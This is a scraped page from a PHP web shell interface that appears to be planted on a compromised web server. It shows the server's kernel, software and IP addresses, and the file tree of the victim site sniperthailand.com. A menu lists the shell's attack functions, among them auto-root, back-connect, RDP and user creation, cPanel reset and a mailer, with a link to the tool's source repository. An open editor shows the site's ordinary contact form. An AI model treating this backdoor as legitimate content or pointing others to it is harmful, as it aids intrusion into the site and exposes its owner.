Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.220.140.173
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
sniperthailand.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets2
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
lasery
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
.htaccess
1.2
KB
-rw-r--r--
0language.php
1.91
KB
-rwxr-xr-x
1Head.php
20.57
KB
-rwxr-xr-x
2HeadMenu.php
14.78
KB
-rwxr-xr-x
2banner.php
4.68
KB
-rwxr-xr-x
3Footer.php
10.82
KB
-rwxr-xr-x
4End.php
5.74
KB
-rwxr-xr-x
about.php
12.83
KB
-rw-r--r--
contact.php
6.64
KB
-rwxr-xr-x
detail.php
11.99
KB
-rwxr-xr-x
download.php
9.8
KB
-rwxr-xr-x
index.php
173
B
-rwxr-xr-x
news-details.php
5.92
KB
-rwxr-xr-x
news.php
5.83
KB
-rwxr-xr-x
product.php
16.06
KB
-rwxr-xr-x
product_category.php
8.7
KB
-rwxr-xr-x
product_category3.php
14.71
KB
-rwxr-xr-x
product_category4.php
5.26
KB
-rwxr-xr-x
product_contact.php
1.87
KB
-rwxr-xr-x
product_detail.php
24.13
KB
-rwxr-xr-x
product_detail_More_products.p...
7.61
KB
-rwxr-xr-x
product_left_cat.php
7.23
KB
-rwxr-xr-x
search.php
4.3
KB
-rwxr-xr-x
service.php
3.8
KB
-rwxr-xr-x
topic-product.php
1.82
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : product_contact.php
<section id="product-contact-form"> <h4 class="h1">Are you interested in this product?</h4> <h4 class="h4">Contact our consultant</h4> <p class="heading">Our consultants are available 24/7</p> <div class="row"> <div class="col-md-1 col-lg-4"> <img src="img/men.png"> </div> <div class="col-md-6 col-lg-4"> <form method="post" class="contact-form-box"> <fieldset> <div class="clearfix"> <div class="col-xs-12 col-md-12"> <input type="hidden" id="id_product" name="id_product" value="1231"> <input type="hidden" id="product_name" name="product_name" value="Piła formatowa z podcinakiem CORMAK MJ45-KD-3E"> <div class="form-group selector1"> <input class="form-control grey validate" type="text" id="name" name="name" value="" placeholder="Name and surname or company name"> </div> <div class="form-group selector1"> <input class="form-control grey validate" type="text" id="email" name="from" data-validate="isEmail" value="" placeholder="E-mail"> </div> <div class="form-group selector1"> <input class="form-control grey validate" type="text" id="phone" name="phone" data-validate="isNumber" value="" placeholder="Telephone"> </div> <div class="form-group"> <textarea style="min-height:100px;" class="form-control" id="message" name="message" placeholder="Message"></textarea> </div> <div class="form-group submit"> <button type="submit" name="submitMessage" id="submitMessage" class="button btn btn-default button-medium"><span>Submit</span></button> </div> </div> </div> </fieldset> </form> <div id="res_msg" class="alert"></div> </div> </div> </section>
Close